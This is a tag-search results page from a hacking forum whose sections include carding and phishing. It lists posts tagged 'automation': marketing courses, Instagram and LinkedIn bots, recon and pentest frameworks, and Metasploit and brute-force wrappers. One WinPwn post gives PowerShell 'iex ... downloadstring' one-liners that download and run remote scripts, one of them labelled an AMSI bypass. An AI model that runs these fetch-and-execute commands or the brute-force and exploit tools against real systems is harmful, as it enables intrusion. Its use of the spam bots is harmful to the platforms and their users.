Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Search the Community

Showing results for tags 'automation'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Product Groups

  • PRIV8
  • Advertising
  • Access Basic
  • Seller
  • Services

Categories

  • Files
  • Online Book
  • Services

Categories

  • Hacking

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

  1. Everything you need to automate your channel & make money! What You Learn: Insight on Niches and Topics Freelancer Hiring &Training Best Practices Step-by-Step Channel Automation Guide [hide][Hidden Content]]
  2. Everything you need to know to start using Mautic with examples, hands-on training Description In this video Tutorial you will learn everything you need to know for getting started with Mautic 4 as a digital marketer. This course is ideal if you are new to Mautic or you want to have solid foundations during your Mautic journey. Maybe you have used Mautic before, but with the help of these tutorials you will finally understand why things work how they do in Mautic. The course consists of videos and downloadable materials: You will learn why Marketing Automation can make a difference in your marketing, how it enhances every activity your company does. I'll make you familliar with the concept of known and unknown contacts, and show you ways to turn cold leads into hot leads, that can't stop buying from you. You'll understand how to organize and collect data in order to be able to use it for automation. You'll be able to create emails using Mautic's Grapejs Editor. You even get a free template to get you started. You'll learn how to import your data and create meaningful segments, that live on your server supporting automated marketing tasks. You'll create your first campaign that help you to reach your goals and scale with automation. Among downloadable materials you'll find templates, that you can upload into Mautic and are ready to use. Extra training content: complete guide to Mautic's MJML Email Editor Who this course is for: Anyone who would like to start working with Mautic Anyone who wants to properly learn all Mautic functions Marketers who want a system that scales with their business [Hidden Content]
  3. efiXplorer – IDA plugin for UEFI firmware analysis and reverse engineering automation Supported versions of Hex-Rays products: every time we focus on the last versions of IDA and Decompiler because trying to use the most recent features from new SDK releases. That means we tested only on recent versions of Hex-Rays products and do not guarantee stable work on previous generations. Why not IDApython: all code developed in C++ because it’s a more stable and performant way to support a complex plugin and get the full power of the most recent SDK’s features. Supported Platforms: Win, Linux, and OSX (x86/x64). [hide][Hidden Content]]
  4. OSINT automation for hackers. BBOT is a recursive, modular OSINT framework written in Python. It is capable of executing the entire OSINT process in a single command, including subdomain enumeration, port scanning, web screenshots (with its gowitness module), vulnerability scanning (with nuclei), and much more. BBOT currently has over 50 modules and counting. [hide][Hidden Content]]
  5. Hello everybody, Someone know if they are script or tool to automate launching exploit against target like armitage or metasploit-autopwn ? thank you advance
  6. efiXplorer – IDA plugin for UEFI firmware analysis and reverse engineering automation Supported versions of Hex-Rays products: every time we focus on the last versions of IDA and Decompiler because trying to use the most recent features from new SDK releases. That means we tested only on recent versions of Hex-Rays products and do not guarantee stable work on previous generations. Why not IDApython: all code developed in C++ because it’s a more stable and performant way to support a complex plugin and get the full power of the most recent SDK’s features. Supported Platforms: Win, Linux, and OSX (x86/x64). Changelog v4.1 [new feature] Improved SMI handlers recognition to support: SxSmiHandler, IoTrapSmiHandler, UsbSmiHandler and etc. [new feature] Improved child SW SMI handlers recognition and now annotated as ChildSwSmiHandler. [new feature] Added visual representation for NVRAM variables and additional context in JSON report: address, service name, var name and var GUID. [bug fix] Numerous improvements and bug fixes in code analyzer and firmware image loader Moving to support of IDA SDK v7.7 [hide][Hidden Content]]
  7. Description THIS COURSE IS FREQUENTLY UPDATED. LAST UPDATED IN NOVEMBER 2020 *** This Course purchase includes video lectures, practice files, quizzes, & assignments, 1-on-1 instructor support, LIFETIME access and a 100%MONEY-BACK GUARANTEE*** Please note that this course will be continuously getting updated with more videos to keep you up to date on Windows PowerShell. You may see here a lot of production ready automation scripts very soon. Please encourage by enrolling and providing your honest reviews & ratings. You can also demand a lecture on a specific topic of PowerShell which comes under scope of this course. The course is designed to help IT Professionals in starting with Windows PowerShell scripting. You might not find an extremely advanced PowerShell topic in the lectures. Here, prime focus is on the IT professionals who want to learn PowerShell scripting but are hesitating due to less or no knowledge of programming. Topics which may not be Windows PowerShell concepts but are important for developing PowerShell understanding are included which comes as bonus. The course is intend to make people think in terms of automating small daily tasks using PowerShell and improve work efficiency and then gradually move towards complex logical tasks. Once you have completed this course, you will be should be able to fully control even the modules which are not part of our discussion. Important Content: PowerShell Automation Solution for File Purging PowerShell Automation for Scheduled Service restarts Windows Task Scheduler and scheduling PowerShell scripts to run PowerShell Basic Fundamentals PowerShell Programming basics for Absolute Beginners File Handling in PowerShell Scripting PowerShell for Daily life Automation All of the basic concepts of PowerShell have been explained in simple terminology. You will start falling for PowerShell, that is a promise. so Lets start this scripting journey Who this course is for: Students/IT Professionals who desire to automate their or team’s day to day life manual work System Administrator (Beginners ) Aspirants seeking carrier in IT Automation Anyone who want to get basic understanding of coding/scripting Requirements Desire to Automate manual tasks PC/Laptop installed with Windows OS. You should be able to use PC/laptop comfortably. Some basic understanding of command line (Win CMD/Unix Shell) will help quickly picking up [Hidden Content] [hide][Hidden Content]]
  8. Salus: Guardian of Code Safety and Security Salus (Security Automation as a Lightweight Universal Scanner), named after the Roman goddess of protection, is a tool for coordinating the execution of security scanners. You can run Salus on a repository via the Docker daemon and it will determine which scanners are relevant, run them and provide the output. Most scanners are other mature open source projects which we include directly in the container. Salus is particularly useful for CI/CD pipelines because it becomes a centralized place to coordinate scanning across a large fleet of repositories. Typically, scanners are configured at the repository level for each project. This means that when making org-wide changes to how the scanners are run, each repository must be updated. Instead, you can update Salus and all builds will instantly inherit the change. Salus supports a powerful configuration that allows for global defaults and local tweaks. Finally, Salus can report metrics on each repository, such as what packages are included or what concerns exist. These reports can be centrally evaluated in your infrastructure to allow for scalable security tracking. Supported Scanners Bandit – Execution of Bandit 1.6.2, looks for common security issues in Python code. Brakeman – Execution of Brakeman 4.10.0, looks for vulnerable code in Rails projects. semgrep – Execution of semgrep 0.36.0 which looks for semantic and syntactical patterns in code at the AST level. BundleAudit – Execution of bundle-audit 0.7.0.1, looks for CVEs in ruby gem dependencies. Gosec – Execution of gosec 2.7.0, looks for security problems in go code. npm audit – Execution of npm audit 6.14.8 which looks for CVEs in node module dependencies. yarn audit – Execution of yarn audit 1.22.0 which looks for CVEs in node module dependencies. PatternSearch – Execution of sift 0.9.0, looks for certain strings in a project that might be dangerous or could require that certain strings be present. Cargo Audit – Execution of Cargo Audit 0.14.0 Audit Cargo.lock files for crates with security vulnerabilities reported to the RustSec Advisory Database Changelog v2.12 Added #415 #417 #429 #432 CycloneDX integration #413 #415 #419 #420 #421 #430 CycloneDX language support (Ruby, Rust, Python, Node Modules, Go) Changed #411 Updated ReportGoDep to use go.sum/go.mod in addition to gopkg.lock #418 Scanner timeout values can now be floating point numbers [hide][Hidden Content]]
  9. Black-Dragon An Advanced Automation Tool For Web-Recon Developed For Linux Systems. What Is Black Dragon? It’s A Tool To Automate The Web Reconnaissance Process, Which Make It Easier To Gather Informations About Your Target. This Tool Will Help You In Your Bug Hunting Or Web Penetration Testing Operation Because It Not Only Gather Informations About The Target, But Also It Arranges All This Information In A Structured Way Which Makes You Analyse The Data In A Good Way. This Tool Works In Linux Systems, Specially In Debian & Debian Based Systems Like: Kali Linux Parrot OS Ubuntu Debian Back Box And Other Debian Based Linux Distro’s What Did This Tool Do: Subdomain-Gathering Using: Subfinder Sublist3r Amass Assetfinder Knockpy github-subdomains Getting The Whole Subdomain Gathered Then Filter The Unique Domains And Extract The Only Live Subdomain Using: httprobe Fuzzing The Application Target Based Using: Gobuster Dirsearch Dirb Endpoints Gathering Using: Waybackurls github-endpoints DNS Information Gathering Using: DNSMap DNSEnum MassDNS Gobuster Port Scanning Nmap [hide][Hidden Content]]
  10. 3klCon Project Full Automation Recon tool which works with Small and Medium scopes. Recommended to use it on VPS machine, it’ll discover secrets and searching for vulnerabilities. Tools used Subfinder Assetfinder Altdns Dirsearch Httpx Waybackurls Gau Git-hound Gitdorks.sh Naabu Gf Gf-templates Nuclei Nuclei-templets Subjack Port_scan.sh Changelog v1.1 Editing the tool’s methodology, you can check it there:”” Editing the selected tools, change some, and use more tools Upgrading to python3 Editing some processes to be as a user option like directory bruteforcing and port scan [hide][Hidden Content]]
  11. Web Application Security Automation Framework which recons the target for various assets to maximize the attack surface for security professionals & bug-hunters Web Application Security Recon Automation Framework It takes user input as a domain name and maximize the attack surface area by listing the assets of the domain like - Subdomains from - Amass ,findomain, subfinder & resolvable subdomains using shuffledns Screenshots Port Scan JS files Httpx Status codes of subdomains Dirsearch file/dir paths by fuzzing [hide][Hidden Content]]
  12. DM Pilot v4.0.1 - Instagram Most Wanted Automation Tool for Direct Message & Scheduled Posts DM Pilot — Most wanted SaaS automation tool for Instagram Direct Message. Publish or schedule any content on your feed or stories directly from the browser. Send messages to yours followers or any list of users! Automate your daily routine and enjoy your SMM strategy. DM Pilot is intended for the SMM manager or any owner of the page on Instagram who wants to send messages to his new followers, unfollowers, following or even unfollowing automatically. Demo: [Hidden Content] [HIDE][Hidden Content]]
  13. Linkedot is a LinkedIn automation tool that automates various activities on LinkedIn such as sending personalized messages, building connections, auto-follow ups, profile visits, remove connections etc. Demo: [Hidden Content] [HIDE][Hidden Content]]
  14. Now you can chat without touching your device and chat with your customers directly from the browser. Send emoji, receive messages, posts, stories, videos and any type of attachments! Send messages to yours followers or any list of users! Automate your daily routine and enjoy your SMM strategy. DM Pilot is intended for the SMM manager or any owner of the page on Instagram who wants to send messages to his new followers, unfollowers, following or even unfollowing automatically. Demo: [Hidden Content] [Hidden Content]
  15. Jok3r v3 Network & Web Pentest Automation Framework About Overview Jok3r is a framework that aids penetration testers for network infrastructure and web security assessments. Its goal is to automate as much stuff as possible in order to quickly identify and exploit "low-hanging fruits" and "quick win" vulnerabilities on most common TCP/UDP services and most common web technologies (servers, CMS, languages...). Combine Pentest Tools Do not re-invent the wheel. Combine the most useful hacking tools/scripts available out there from various sources, in an automatic way. Automate Attacks Automatically run security checks adapted to the targeted services. Reconnaissance, CVE lookup, vulnerability scanning, exploitation, bruteforce... Centralize Mission Data Store data related to targets in a local database. Keep track of all the results from security checks and continuously update the database. Features Key Features Pentest Toolbox Management Selection of Tools Compilation of 50+ open-source tools & scripts, from various sources. Docker-based Application packaged in a Docker image running Kali OS, available on Docker Hub. Ready-to-use All tools and dependencies installed, just pull the Docker image and run a fresh container. Updates made easy Easily keep the whole toolbox up-to-date by running only one command. Easy Customization Easily add/remove tools from a simple configuration file. Network Infrastructure Security Assessment Many supported Services Target most common TCP/UDP services (HTTP, FTP, SSH, SMB, Oracle, MS-SQL, MySQL, PostgreSQL, VNC, etc.). Combine Power of Tools Each security check is performed by a tool from the toolbox. Attacks are performed by chaining security checks. Context Awareness Security checks to run are selected and adapted according to the context of the target (i.e. detected technologies, credentials, vulnerabilities, etc.). Reconnaissance Automatic fingerprinting (product detection) of targeted services is performed. CVE Lookup When product names and their versions are detected, a vulnerability lookup is performed on online CVE databases (using Vulners & CVE Details). Vulnerability Scanning Automatically check for common vulnerabilities and attempt to perform some exploitations (auto-pwn). Brute-force Attack Automatically check for default/common credentials on the service and perform dictionnary attack if necessary. Wordlists are optimized according to the targeted services. Post-authentication Testing Automatically perform some post-exploitation checks when valid credentials have been found. Web Security Assessment Large Focus on HTTP More than 60 different security checks targeting HTTP supported for now. Web Technologies Detection Fingerprinting engine based on Wappalyzer is run prior to security checks, allowing to detect: Programming language, Framework, JS library, CMS, Web & Application Server. Server Exploitation Automatically scan and/or exploit most critical vulnerabilities (e.g. RCE) on web and application servers (e.g. JBoss, Tomcat, Weblogic, Websphere, Jenkins, etc.). CMS Vulnerability Scanning Automatically run vulnerability scanners on most common CMS (Wordpress, Drupal, Joomla, etc.). Local Database & Reporting Local Database Data related to targets is organized by missions (workspaces) into a local Sqlite database that is kept updated during security testings. Metasploit-like Interactive Shell Access the database through an interactive shell with several built-in commands. Import Targets from Nmap Add targets to a mission either manually or by loading Nmap results. Access all Results All outputs from security checks, detected credentials and vulnerabilities are stored into the database and can be accessed easily. Reporting Generate full HTML reports with targets summary, web screenshots and all results from security testing. Architecture Framework Architecture General Architecture graph Flowchart Demo Demonstration Videos Download Get Jok3r Jok3r is open-source. Contributions, ideas and bug reports are welcome ! [Hide] [Hidden Content]]
  16. Autobot is an Instagram autmoation bot that offers dozens of features and functionalities. It saves your time by helping you get more done. Even if you’re not on your computer, you could share your stories and posts easily. Increase your sales. Get real results in no time. Get maximum performance from your automations thanks to its high end filtering features. Save time and effort with Autobot. [Hidden Content] [HIDE][Hidden Content]]
  17. Automation for internal Windows Penetration Testing. 1) Automatic Proxy Detection 2) Elevated or unelevated Detection 3) Forensic Mode oder Pentest Mode a. Forensik -> Loki + PSRECON + Todo: Threathunting functions b. Pentest -> Internal Windows Domain System i. Inveigh NBNS/SMB/HTTPS Spoofing ii. Local Reconing -> Hostenum, SessionGopher, FileSearch, PSRecon iii. Domain Reconing -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon 1) Todo: Grouper for Group Policy overview iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords, MS-Exploit Search (Sherlock), WCMDump, JAWS v. Lazagne Password recovery vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights vii. LateralMovement -> FindLocalAdminAccess 1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI 2) DomainPasswordspray viii. Share Enumeration ix. FindGPOLocation –> Search for user/group rights x. Find-Fruit Changelog v1.1 This version contains mainly new features. The execution of various C# binaries in memory, GPO audit functions, various new local recon checks, and domain checks. Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring(‘[Hidden Content]) For AMSI Bypass use the following oneliner: iex (new-object net.webclient).downloadstring(‘[Hidden Content]) [HIDE][Hidden Content]]
  18. No coding experience necessary. This guide shows you how to automate instagram likes, follows, and comments across 25 accounts for free. You can use this for easy guerrilla marketing, growing your small business from cold start on auto-pilot, or for spreading any other message. I’ve combined all the best bots you can build here to grow up to 50–200 followers per day. It only takes about 15 minutes to copy these commands into google cloud servers and run the bot. [Hidden Content]
  19. Blue Prism Robotic Process Automation (RPA) versions prior to 6.5.0.12573 suffer from a privilege escalation vulnerability. View the full article
  20. Brutex is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra and DNSenum. This tool will automatically run an nmap scan to your target and then it will brute force all the open services for you, such as FTP, SSH and more using Hydra. BruteX ABOUT: Automatically brute force all services running on a target Open ports Usernames Passwords INSTALL: ./install.sh USAGE: brutex target <port> DOCKER: docker build -t brutex . docker run -it brutex target <port> DEMO VIDEO: Download: [HIDE][Hidden Content]]
  21. EasySploit v3.1 (Linux) - Metasploit automation (EASIER and FASTER than EVER) Options: (1) Windows --> test.exe (payload and listener) (2) Android --> test.apk (payload and listener) (3) Linux --> test.py (payload and listener) (4) MacOS --> test.jar (payload and listener) (5) Web --> test.php (payload and listener) (6) Scan if a target is vulnerable to ms17_010 (7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue) (8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec) (9) Exploit Windows with a link (HTA Server) (10) Contact with me - My accounts [Hidden Content]
  22. PRETty "PRinter Exploitation Toolkit" LAN automation tool PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET againt each individual printer, PRETty will automatically discover and run choosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (See the "Lists" section) Download: [HIDE]. [Hidden Content]]
  23. Whatsapp Automation for sending and recieving messages Whatsapp Automation is a collection of APIs that interact with WhatsApp messenger running in an Android emulator, allowing developers to build projects that automate sending and receiving messages, adding new contacts and broadcasting messages multiple contacts. The project uses Selinium, Appium, Python and Android Virtual Device Emulator. Demo Video.. [Hidden Content] Requirements: java Android Studio & Android Emulator setup with latest Android version Appium Server to interact with Emulator python environment for running Flask RabbitMQ for maintaining queue system for incoming requests [HIDE][Hidden Content]]
  24. The BMC Network Automation allows authenticated users to hijack established remote sessions of other users, version v8.7.00.000 b383 u038 was confirmed to be vulnerable. View the full article
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.